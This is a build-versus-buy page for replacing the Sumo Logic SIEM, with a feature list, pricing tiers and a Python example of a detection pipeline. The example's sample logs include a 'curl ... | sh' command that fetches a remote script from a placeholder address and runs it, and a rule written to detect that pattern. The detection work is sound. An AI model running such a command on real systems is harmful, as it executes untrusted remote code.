Sumo Logic
sumologic.com
Build Difficulty: 4/5
A few focused days to build a solid replacement
Cloud log management, monitoring, SIEM tools
How to Replace Sumo Logic
Overview
Features
73 features across 11 categories
AI(12)
AutoML-powered anomaly detection to reduce false positives in real-time alerting
AI models to detect suspicious and anomalous deviations from baseline behaviors
Multi-agent AI platform powered by specialized agents that identify, triage, and resolve issues faster
Collection of apps leveraging machine learning to create advanced operational and security insights benchmarked against population of Sumo Logic customers
Level of confidence predicted by Sumo Logic's Global Intelligence ML model that the Insight is actionable
Instant AI answers to platform questions
Unified conversational interface that connects users to specialized AI agents
Machine learning-driven SOAR that learns repeatable patterns, distinguishes between real and false threats, and offers recommended courses of action
Turns natural language requests into queries, simplifying data exploration
Automates alert triage to identify threats and speed response (beta)
Condenses Insight signals into summaries, reducing noise and highlighting context
Combination of multiple Machine Learning capabilities working together to ensure smooth and uninterrupted SecOps workflow
Administration(2)
Control the daily volume of log data sent to Sumo Logic by assigning ingest budgets that define daily log capacity limits
Pause alert notifications from monitors according to a schedule you define
Analytics(15)
Aggregate distributed trace data and derive advanced analytics using Sumo Logic Query Language
Provides contextual insights about triggered alerts to minimize investigation and resolution time
Quickly identify anomalies and drill down into high-severity logs in the log search histogram
Ingested data fields organized into a schema for further queries and advanced analytics
View information about an Entity in an Insight and all other connected (related) entities or systems
View information about entity activity before, during, and after Signals and Insights involving the entity
Automatically visualize IP addresses in dashboards by geolocation
Transparent rules engine applied to incoming logs to surface Signals and Insights with 900+ out-of-the-box rules
Dashboard offering suggestions for making adjustments to rules, such as writing rule tuning expressions and changing severities
Use Sumo Logic's Query Language and Dashboarding Framework to parse, aggregate and visualize insights from raw log data
Patented operators designed to quickly assess activity patterns and surface behavioral insights to accelerate troubleshooting
Enrich log data ingested by Sumo Logic in real time with in-memory lookup tables
Predict future time series metrics values using linear and auto-regressive models for resource and capacity planning
Forecast trends and identify anomalous activity in real time with advanced query operators
Manage software delivery performance against industry-standard DORA metrics
Automation(4)
Build and execute automated playbooks tied to alerts with Sumo Logic's Automation Service
Automatically take action to address security flaws using pre-defined workflows
Set up actions that run automatically when certain conditions are met for Insight enrichment, notifications, and containment actions
Predefined set of actions and conditional statements that run in automated workflow to respond to event or incident type
Compliance(3)
Monitor and audit Sumo Logic usage to meet regulatory and compliance requirements
Meet PCI DSS compliance requirements with automated controls and reporting
Apps designed to help teams meet evolving PCI requirements and maintain audit compliance
Integration(6)
Route contextualized alerts to 3rd party tools including Slack, PagerDuty, ServiceNow to streamline investigations
Integrate Sumo Logic's Log Search capabilities into workflows and 3rd party tools via API for complex use cases
Administer Sumo Logic and manage users via API and/or with IaC tooling like Terraform
Easily set up and configure native OTel data ingest and install relevant content to quickly derive insights
Enable k8s OTel collection with Sumo Logic's Helm Chart
Access to 400+ apps and integrations designed to turn data into insights
Monitoring(5)
Real-time dashboards and searches evaluating organization against statistical baseline for performance and risk indicators
Streamlined collection, storage, and analysis of logs as a single source of truth in unified SaaS platform
Monitor infrastructure performance and health across cloud and on-premises systems
View real-time feed of log events associated with a Source or Collector for development and troubleshooting
Collect log data from cloud and on-premises systems to proactively analyze and resolve issues before they affect applications
Observability(8)
Native support for collection of OpenTelemetry with pre-built analytics to monitor and respond to user-impacting performance issues
Full-stack observability with MELT telemetry to ensure application reliability
Out-of-the-box analytics visualize k8s hierarchical relationships to simplify troubleshooting across clusters
Power SLIs and SLOs using metrics
Deep observability for multi-cloud organizations across AWS, Azure, GCP with pre-built integrations
Monitor real-user interactions across applications with pre-built visualizations and alerts powered by OpenTelemetry
Simple setup and monitoring of critical user journeys, error budgets and more using pre-built SLO dashboards
Easily understand relationships of complex service interactions across applications to simplify troubleshooting
Pricing(1)
Pay only for the data being used so you can ingest everything without budget waste
Reporting(3)
Tailor, extend, or create dashboards to align with specific monitoring, analytics, and reporting needs
Out-of-the-box dashboards that visualize Sumo Logic audit logs to give teams quick insight into user activities and events
Visualize historical and real-time data to derive contextualized, actionable analytics
Security(14)
Tools for managing and documenting security cases, including evidence collection, analysis, and reporting
Continuously view the overall state of cybersecurity readiness of your cloud environment
Speed up incident investigations by automatically triaging alerts and correlating threats through log analytics
Security Orchestration, Automation and Response for automated incident response workflows
Identify indicators of compromise (IOCs) in log data by comparing against CrowdStrike IOC feed
Security platform that provides protection, compliance, and AI-driven guided search to help resolve incidents faster
Shows MITRE ATT&CK adversary tactics, techniques, and procedures from Enterprise Matrix covered by rules in system
Includes CrowdStrike, Intel471, and other native threat intel feeds to add context to SIEM rules
Quantifying the possibility of major impacts on business-critical processes due to cybersecurity threats
Centralized repository for security logs and data enabling advanced analytics
Support for federated identity access management and single sign-on
Detect security threats faster with AI-powered analysis of logs and security data
Suite of UEBA-specific rules designed to detect various classifications of anomalous activities compared against normal baselines
Configurations for war room management in security operations
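The rules engine over incoming logs, in-memory lookup enrichment, IOC matching against a threat-intel feed, rule tuning expressions, entity-centric Insights and the ATT&CK coverage view listed above are the core of what a home-built replacement has to reproduce. The block below is an added example, not Sumo Logic's code: a minimal version of that pipeline in Python over constructed JSON log lines. The lookup tables, the IOC feed contents, the rule names, severities, technique IDs and the Insight threshold are all assumed for illustration.

```python
import json
import ipaddress
from collections import defaultdict

# Constructed sample log lines (one JSON event per line); not real data.
SAMPLE_LOGS = """\
{"ts":"2024-05-01T10:00:01Z","host":"web-01","event":"ssh_login","result":"failure","user":"root","src_ip":"198.51.100.9"}
{"ts":"2024-05-01T10:00:02Z","host":"web-01","event":"ssh_login","result":"failure","user":"root","src_ip":"198.51.100.9"}
{"ts":"2024-05-01T10:00:03Z","host":"web-01","event":"ssh_login","result":"failure","user":"root","src_ip":"198.51.100.9"}
{"ts":"2024-05-01T10:00:09Z","host":"web-01","event":"ssh_login","result":"success","user":"deploy","src_ip":"203.0.113.7"}
{"ts":"2024-05-01T10:01:00Z","host":"web-01","event":"proc_exec","cmd":"curl http://203.0.113.7/a.sh | sh","src_ip":"","user":"deploy"}
{"ts":"2024-05-01T10:02:00Z","host":"bastion","event":"ssh_login","result":"success","user":"ops","src_ip":"192.0.2.44"}
"""

# In-memory lookup tables (constructed stand-ins for a threat-intel IOC feed,
# a geolocation table and an asset inventory). Enrichment is a dict/prefix lookup.
IOC_FEED = {"203.0.113.7": "known_c2", "198.51.100.9": "mass_scanner"}
GEO_TABLE = {"203.0.113.0/24": "XX", "198.51.100.0/24": "YY", "192.0.2.0/24": "US"}
ASSET_TABLE = {"web-01": {"tier": "prod", "owner": "platform"},
               "bastion": {"tier": "prod", "owner": "secops"}}


def enrich(event):
    """Attach IOC, geo and asset context to a parsed event from the in-memory tables."""
    ip = event.get("src_ip")
    event["ioc"] = IOC_FEED.get(ip)
    event["geo"] = None
    if ip:
        addr = ipaddress.ip_address(ip)
        for cidr, country in GEO_TABLE.items():
            if addr in ipaddress.ip_network(cidr):
                event["geo"] = country
                break
    event["asset"] = ASSET_TABLE.get(event.get("host"), {})
    return event


# Each rule: a match predicate over the enriched event, a tuning expression that
# suppresses known-benign matches, a severity and the ATT&CK technique it covers.
# Rule names, severities and technique IDs are assumed for the example.
RULES = [
    {"name": "login_from_ioc", "severity": 8, "technique": "T1078",
     "match": lambda e: e["event"] == "ssh_login" and e["result"] == "success" and bool(e["ioc"]),
     "tuning": lambda e: False},
    {"name": "ssh_from_scanner", "severity": 3, "technique": "T1110",
     "match": lambda e: e["event"] == "ssh_login" and e["ioc"] == "mass_scanner",
     "tuning": lambda e: e["asset"].get("tier") != "prod"},  # tune out scanner noise on non-prod
    {"name": "curl_pipe_sh", "severity": 7, "technique": "T1059.004",
     "match": lambda e: e["event"] == "proc_exec" and "curl" in e.get("cmd", "") and "| sh" in e.get("cmd", ""),
     "tuning": lambda e: False},
]


def run_rules(raw_lines):
    """Parse, enrich and evaluate every rule against every event; return one signal per hit."""
    signals = []
    for line in raw_lines.strip().splitlines():
        ev = enrich(json.loads(line))
        for rule in RULES:
            if rule["match"](ev) and not rule["tuning"](ev):
                signals.append({"rule": rule["name"], "severity": rule["severity"],
                                "technique": rule["technique"], "entity": ev["host"],
                                "user": ev.get("user"), "src_ip": ev.get("src_ip"),
                                "geo": ev["geo"], "ts": ev["ts"]})
    return signals


def build_insights(signals, threshold=12):
    """Group signals by entity; an entity whose summed severity reaches the threshold becomes an Insight."""
    by_entity = defaultdict(list)
    for sig in signals:
        by_entity[sig["entity"]].append(sig)
    insights = []
    for entity, sigs in by_entity.items():
        score = sum(s["severity"] for s in sigs)
        if score >= threshold:
            insights.append({"entity": entity, "score": score,
                             "techniques": sorted({s["technique"] for s in sigs}),
                             "rules": sorted({s["rule"] for s in sigs})})
    return insights


def attack_coverage(rules=RULES):
    """Techniques the rule set covers: the data behind an ATT&CK coverage matrix view."""
    return sorted({r["technique"] for r in rules})


if __name__ == "__main__":
    for insight in build_insights(run_rules(SAMPLE_LOGS)):
        print(json.dumps(insight))
```

On the constructed input the three scanner failures, the successful login from the C2 address and the `curl | sh` execution all land on `web-01`, whose summed severity crosses the threshold and produces a single Insight; the bastion login produces nothing. The tuning expression is the piece most teams underbuild: without it, every scanner hitting a dev box becomes a signal and the Insight score is pure noise.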
Pricing
Essentials
- ✓Onboard in minutes
- ✓Start investigating and troubleshooting fast
- ✓AI-driven alerting to reduce alert fatigue
- ✓Automatically detects anomalies reducing false positives
- ✓ML-powered RCA to slash MTTR
- ✓Identify incident source with telemetry data
- ✓Hundreds of integrations
- ✓Up to 300 log monitors
- ✓Up to 500 metric monitors
- ✓Up to 365 days log retention
- ✓Up to 50,000 metrics per day
- ✓Up to 5GB trace data per day
Enterprise Suite
Popular
- ✓Discover threats faster with cloud-native SIEM
- ✓High-fidelity entity-centric detection
- ✓Threats mapped to MITRE ATT&CK
- ✓UEBA-driven coverage
- ✓Investigate incidents quickly with threat intelligence
- ✓Full visibility into logs and advanced analytics
- ✓Strengthen security posture with premium threat intelligence feeds
- ✓Enrich investigations with external context
- ✓24/7 support
- ✓Automation service with complex multi-org support
- ✓Up to 1000 log monitors
- ✓Unlimited user access
- ✓Unthrottled performance
- ✓Unlimited metrics per day
- ✓Unlimited trace data per day
- ✓Unlimited log retention
Cost Calculator
Pricing data not available for Sumo Logic. Check their website for current pricing.
Build vs Buy
Should you build a Sumo Logic alternative or buy the subscription? Estimate based on 73 features.
Buy Sumo Logic
Better Value
Build Your Own
Buying Sumo Logic saves ~$92,400 over 3 years vs building.
Estimates based on 73 features and a BuildScore of 4/5. Actual costs vary.
Integrations
11 known integrations